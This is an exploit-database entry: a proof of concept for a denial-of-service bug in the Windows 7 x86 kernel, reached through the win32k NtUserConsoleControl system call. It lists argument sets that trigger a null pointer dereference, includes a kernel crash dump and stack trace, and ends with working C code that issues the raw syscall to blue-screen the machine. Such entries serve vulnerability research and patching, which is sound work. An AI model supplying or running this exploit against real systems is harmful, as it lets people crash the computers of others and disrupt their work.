|
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:
# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).
# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]
# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope
# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_
# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
# PoC code:
#include <Windows.h>
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
int _tmain(int argc, _TCHAR* argv[])
{
int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
LoadLibrary(L"user32.dll");
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
return 0;
}
# The vulnerability has only been tested in Windows 7 x86.
|